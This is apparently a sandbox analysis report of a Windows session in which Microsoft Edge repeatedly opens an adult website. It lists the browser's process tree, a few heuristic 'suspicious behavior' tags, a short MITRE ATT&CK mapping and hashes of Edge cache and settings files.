    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:5680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
    3⤵
    PID:5916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
    3⤵
    PID:5936
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
    3⤵
    PID:2512
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
    3⤵
    PID:1228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
    3⤵
    PID:5328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5064 /prefetch:8
    3⤵
    PID:2732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5024 /prefetch:8
    3⤵
    PID:5208
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
    3⤵
    PID:5608
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
    3⤵
    PID:2192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5712 /prefetch:8
    3⤵
    PID:5000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
    3⤵
    PID:3616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5548 /prefetch:8
    3⤵
    PID:4384
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
    3⤵
    PID:5372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5736 /prefetch:8
    3⤵
    PID:2820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
    3⤵
    PID:4156
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,5062230807060777440,5451805747023537837,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6224 /prefetch:8
    3⤵
    PID:4216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:6040
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:6104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:1336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:620
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:5860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  PID:3208
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:5608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rule34.xxx/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:3224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2fdd46f8,0x7ffe2fdd4708,0x7ffe2fdd4718
    3⤵
    PID:5752
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,5969715785546446168,14536136285935269626,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
    3⤵
    PID:6024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,5969715785546446168,14536136285935269626,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,5969715785546446168,14536136285935269626,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
    3⤵
    PID:1848
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,5969715785546446168,14536136285935269626,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
    3⤵
    PID:3984
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,5969715785546446168,14536136285935269626,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
    3⤵
    PID:5436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2136,5969715785546446168,14536136285935269626,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 /prefetch:8
    3⤵
    PID:5408

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2116

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1696

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2248

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2256

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:536

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5380

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1800

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
61152360dd4155de78e35bcb70cbddb0

SHA1
c19e688af4a0b7c88b4610c1e5908f59febf4d20

SHA256
2a786f6d8d500d31d6fe066ca2029eb05e2ef67210482e4f1b633b919fe13a74

SHA512
6f5b439d5c5d03156c3b7b68995d0742285eb354c4cf90eec40c174d29592db86ac17d49916dd51c6b844b13091b33d909c4675725863c780aecd6a1535930b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
81e892ca5c5683efdf9135fe0f2adb15

SHA1
39159b30226d98a465ece1da28dc87088b20ecad

SHA256
830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17

SHA512
c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c51429cd2212d9d64b0a2f085a41f58c

SHA1
74eb0757c77b4fcf5bec2c52a3873e52dff3f3b2

SHA256
5e1fd13113391bba631bd9718657d92411a94f3e9d8a57bb155c1994f81cdd25

SHA512
cc77aa318dea967594874faab9a3d825af1cfba08d8bdfb5953c9e8100a1548044b24274a79181b95ecd21fb7b6608cfebf3c0d9645e16acad3d142735a55682

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
18c9b1875209b8fc245ca9fa69d0ce83

SHA1
3a1706f28085242e1f803e1b4c6b517eec7eb6fb

SHA256
dda61018b5d372d59608fd24faf78b15967e7acd83e3f7f76fc6f93dfa8a24a4

SHA512
b64c1297ddb419e095156d9a72e885477b749cd7527edb44a25cbc4a40704045c90c790dd52374dc4332c4cc95223427f73f23ee1a8a37d67669b6d21167f6c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56067634f68231081c4bd5bdbfcc202f

SHA1
5582776da6ffc75bb0973840fc3d15598bc09eb1

SHA256
8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4

SHA512
c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aab14253040b23ad2b4214659b16ec2c

SHA1
201218ff876c5392248e30028f6f6b24631bffb3

SHA256
62b31a9c5e2c46b786939efd45fe77ccf9f3c41030aaa84a64fbb76213d5cbe6

SHA512
34098fabd2ca072cc2400cda82b050a55037dbcfd73e252abed38c6dee0a819357f9d99d2a0a6874e225ed283262ac229640af0c56415d1596b4249c48d03f7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
633d8cb24b6e2762c22ae851c1baafea

SHA1
7f94625f81fb22546fd0e489a38732ce86649e7e

SHA256
fb07d7ed27aa66f5ef0b6d82a20b4b3d0dcc9cd48af55336b4cc409192fa21ed

SHA512
1654c21cf6b799d80d85a514401d633c7c6d11f9fcbf333b2fa9d6921b16105fd0ffc00ab8c204c256984848319871bb5c83089ea7678105d70bc9766d7e98ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\487a3da0-76c3-48a1-8b37-5c57b7b0bc08.tmp

Filesize
5KB

MD5
9037e447843968f053b6bf60f19dd408

SHA1
760cf50318ab0abe3dd2b6a31863704b70631e17

SHA256
b78b6ab0e050cb258710ed0dfbc6235a05e3df3e8103f53f5cb75cd9aa3185e1

SHA512
1a14463912ad9f1a1b1bf93132f737871df7bf091a1f63c58c65264cb7d1d7d8085b532b36b0ef0a831e4a104f8730ec6891b9a94190f921e269bae52ce0ae3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6909c50e-5f08-40f0-bb81-4a747ebe7daf.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
1cd46cee565abe6cfdcdc22cfdccdbbf

SHA1
73b53fb5c0869925e5c8147d015658d3d66349c1

SHA256
2aa69616f56e5a9c777b2d823834f328288192bf2d689c616afabe74a4607dd2

SHA512
58d0bf4c1ef28f83e8b38d6034282b3184ebd6fbfec19227f465b372aaaec583dd683ca85516d90548d49791db24d42655842facea8ea4a8d8dc607048e1cf45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
bee208fd17ac25b1a282c1dd493097b6

SHA1
c9016a66cde23bd5e78e17ce8f75ba23c4c042ec

SHA256
ae3a29cfb447aebf82752011f3527c12c1ddd5c2e23a61a76e156c6f3bb903ce

SHA512
ad5034848c333e3d46a91be37d61227ab7b7cee16c270cb488248fa25be108582b33779002cad7e3df9d078607b31dc6514b8b26840fa4fa0346ceb4b6e81844

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
dee0670043cd5cec08697df1e2983d30

SHA1
22e2e4d6124ddc1a269e1438f4a246221b7a1a58

SHA256
a435e11e1119f3f7434dd6e66185c3210a024a25e5c8fc924f0cf586af6bfa7c

SHA512
2c00aef1a72b00506db0c4fd8736560bc53064156b677868723802bc83e7d24d833ee4a57e275a6a4c25f34efa8d51fd61d61ec24829f7627b0afe757f17628d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
759a7d68fc3f8f317f649d296a9cf2a2

SHA1
1642ae2ed1199032b3bad8ae9da9ab3c8197e05a

SHA256
11dc55e27ca2fcf7a3a76d92284239c191defb3d86168511652a5f2fd70246d2

SHA512
79c17a6e8588369a850c4cf9c4464fcad3fed280349defd7e765924365cd1f0ee24f8491089b27d7a85dc461cfa63430b139b4565d7d0840ac80fb62f233b771

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
6572427516c5d61d343f2b1c987e709e

SHA1
6b020491ccf4f9862fdb933f00692d507b51f09c

SHA256
fbcd24e30949eb116f1160186291657de93676fa65282e2d106031d627596f20

SHA512
593df503349c0d17e3af49eb8e2957ee7da824ec3fb6efec721044316fc55163e5dffb1fe3b44e1f635470fd5d59f17b0d9f23e052f74302880927d3e667fe16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
10b34c9a877db55f1f533353e6e83639

SHA1
6afedf50698b064bd6886bacf5f7176c9d7e03fc

SHA256
2faaf4ec3b8ec23b80800b9bbcfb7c3cc190e647eeab3598d1665c64a4c6a398

SHA512
1f426db8282f3e6b936875b8fe510fcce0a6e3fa0636e33de4e0cf52e6895c2a9ecb5141cb742bf24e22464fc4870a4388133811599bb484a2495a1db33c4c42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
22KB

MD5
09f8c92e96d3cf8ee18529227652a071

SHA1
eec285f8a4a762ca3de3e80ad47a3405bb01087c

SHA256
268e7bd4d3a846ebeb61b4be20cbbe6f98288e4a08de05e024c99eaba11a370d

SHA512
6c34f957570b168688102e50591dcc3f1a5369b2933b4dcdb1addbbf926671a330e8f4740bb14ca51a56c8b9bf77c44c57c0248840b131e445bd2cb63ccfd8c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
53KB

MD5
547bbb87eda6f00df223e1098acce4b4

SHA1
eef725f1e46c2759cf1360c4b0f3096dc8abc5e5

SHA256
e524cf27e82b10665b3f6f1838a4ba257d94da793c24b3977c91771cd8662cf9

SHA512
8052351b2a04820b1872eb7ffb84c9f9c0df7455c9ac2f2dcd697cb16bf928b979f06e25a100b42e3b08dc04a344430072d0905a72845006c9378ca591829468

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0e97dbc18aecd4e0_0

Filesize
201B

MD5
38a1847fc7c54338380ffdece041b557

SHA1
472bae0c952fe6219ccb34ed2bcd61c02fc251d2

SHA256
0db28eaa281355baf3d2da3d9252c923e60a50e919b67562da55153fff501fc7

SHA512
c22ddcede8f933646948418548930a0da83ee274a811cf1f67c584bb45b2e2488fe0612eac6d7b51e6729e76be8670e0da6238893e61c2ca16dcb75033e45450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7808ede68e313e4c_0

Filesize
239B

MD5
5aae1e17a7f6fa6553ba5d5ff2159f46

SHA1
a1887abfb7287d4f671778dbae5ca599edecb203

SHA256
8da56f543dc9f5251c573dec05225e9cadb80db3805a1619772a3cee1a86835a

SHA512
eed8ea8ea271aaf44c8ab80308c98beccd685bf89921c0220a0d00128dcb537577c78400aafa7155a6b59b3be6ec3b23ae79309febf63a0c66fc3e2ca5e24d87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8894ca068436fc49_0

Filesize
238B

MD5
b91fedde4fee544e2d2bb41efbfb0c21

SHA1
73a8acb93422594793b12286ab617571872cb613

SHA256
00940acbcd62b896934309d1de9818003cb8ab86d444b233a57ec33ad38b5d27

SHA512
cd542301fb7a6b0357f10dfdc98319525b185dc98c463a30c701b43b032ca07b2df18346cc77331b43320da3cdd365ec2eca055d4536d9a891958aa0f1e556e2

Download Submit
